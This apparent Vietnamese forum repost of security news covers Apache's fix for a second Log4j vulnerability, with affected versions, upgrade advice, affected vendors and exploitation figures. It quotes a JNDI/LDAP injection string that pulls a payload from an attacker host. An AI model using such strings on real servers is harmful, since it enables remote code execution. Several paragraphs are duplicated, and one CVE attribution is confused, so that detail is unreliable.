WhiteHat News #ID:3333
VIP Members
-
04/06/2014
-
37
-
446 bài viết
Apache phát hành bản vá cho lỗ hổng thứ hai trên Log4j
Apache Software Foundation (ASF) vừa tiếp tục đưa ra bản sửa lỗi mới cho Log4j. CVE-2021-45046 ảnh hưởng đến tất cả các phiên bản của Log4j từ 2.0-beta9 đến 2.12.1 và 2.13.0 đến 2.15.0.
Bản vá cho lỗ hổng CVE-2021-44228, là lỗi có thể bị lợi dụng để "tạo dữ liệu đầu vào độc bằng cách sử dụng mẫu Tra cứu JNDI, dẫn đến tấn công từ chối dịch vụ (DoS)". Phiên bản mới nhất của Log4j, 2.16.0 (dành cho người dùng yêu cầu Java 8 trở lên). Người dùng Java 7 được khuyến nghị nâng cấp lên bản phát hành Log4j 2.12.2.
JNDI viết tắt của Java Naming and Directory Interface, là một API Java cho phép các ứng dụng được mã hóa bằng ngôn ngữ lập trình, tìm kiếm dữ liệu và tài nguyên như máy chủ LDAP. Log4Shell nằm trong thư viện Log4j, một khung ghi nhật ký mã nguồn mở trên Java thường được tích hợp vào các máy chủ web Apache.
Sự cố tự xảy ra khi thành phần JNDI của trình kết nối LDAP được tận dụng để đưa yêu cầu LDAP độc hại - chẳng hạn như "$ {jndi: ldap: // attacker_controled_website / payload_to_be_executed}" - tức là khi đăng nhập trên máy chủ web chạy phiên bản dễ bị tấn công của thư viện, cho phép kẻ xấu truy xuất và thực thi payload từ xa.
Lỗ hổng tồn tại trong công cụ được sử dụng phổ biến trong các ứng dụng Java, là động cơ cho kẻ xấu nhòm ngó tấn công hàng triệu thiết bị trên khắp thế giới.
Đáng lo hơn với các tổ chức là lỗ hổng ảnh hưởng đến hàng trăm sản phẩm doanh nghiệp lớn từ một số công ty như: Akamai, Amazon, Apache, Apereo, Atlassian, Broadcom, Cisco, Cloudera, ConnectWise, Debian, Docker, Fortinet, Google, IBM, Intel, Juniper Networks, Microsoft, Okta, Oracle, Red Hat, SolarWinds, SonicWall, Splunk, Ubuntu, VMware, Zscaler và Zoho, điều này đặt ra rủi ro cho chuỗi cung ứng phần mềm.
Sau khi được công bố, ít nhất đã có mười nhóm hacker khác nhau tiến hành khai thác lỗ hổng và khoảng 44% mạng công ty trên toàn cầu đã bị tấn công. Cơ quan An ninh mạng và Cơ sở hạ tầng Hoa Kỳ (CISA) cũng đã thêm Log4Shell vào Danh mục các lỗ hổng đang được khai thác và đưa ra hạn chót là ngày 24 tháng 12 cho các cơ quan liên bang để cập nhật các bản vá cho lỗ hổng.
Bản vá cho lỗ hổng CVE-2021-44228, là lỗi có thể bị lợi dụng để "tạo dữ liệu đầu vào độc bằng cách sử dụng mẫu Tra cứu JNDI, dẫn đến tấn công từ chối dịch vụ (DoS)". Phiên bản mới nhất của Log4j, 2.16.0 (dành cho người dùng yêu cầu Java 8 trở lên). Người dùng Java 7 được khuyến nghị nâng cấp lên bản phát hành Log4j 2.12.2.
Sự cố tự xảy ra khi thành phần JNDI của trình kết nối LDAP được tận dụng để đưa yêu cầu LDAP độc hại - chẳng hạn như "$ {jndi: ldap: // attacker_controled_website / payload_to_be_executed}" - tức là khi đăng nhập trên máy chủ web chạy phiên bản dễ bị tấn công của thư viện, cho phép kẻ xấu truy xuất và thực thi payload từ xa.
Lỗ hổng tồn tại trong công cụ được sử dụng phổ biến trong các ứng dụng Java, là động cơ cho kẻ xấu nhòm ngó tấn công hàng triệu thiết bị trên khắp thế giới.
Đáng lo hơn với các tổ chức là lỗ hổng ảnh hưởng đến hàng trăm sản phẩm doanh nghiệp lớn từ một số công ty như: Akamai, Amazon, Apache, Apereo, Atlassian, Broadcom, Cisco, Cloudera, ConnectWise, Debian, Docker, Fortinet, Google, IBM, Intel, Juniper Networks, Microsoft, Okta, Oracle, Red Hat, SolarWinds, SonicWall, Splunk, Ubuntu, VMware, Zscaler và Zoho, điều này đặt ra rủi ro cho chuỗi cung ứng phần mềm.
Sau khi được công bố, ít nhất đã có mười nhóm hacker khác nhau tiến hành khai thác lỗ hổng và khoảng 44% mạng công ty trên toàn cầu đã bị tấn công. Cơ quan An ninh mạng và Cơ sở hạ tầng Hoa Kỳ (CISA) cũng đã thêm Log4Shell vào Danh mục các lỗ hổng đang được khai thác và đưa ra hạn chót là ngày 24 tháng 12 cho các cơ quan liên bang để cập nhật các bản vá cho lỗ hổng.
Theo: The Hacker News
Chỉnh sửa lần cuối bởi người điều hành: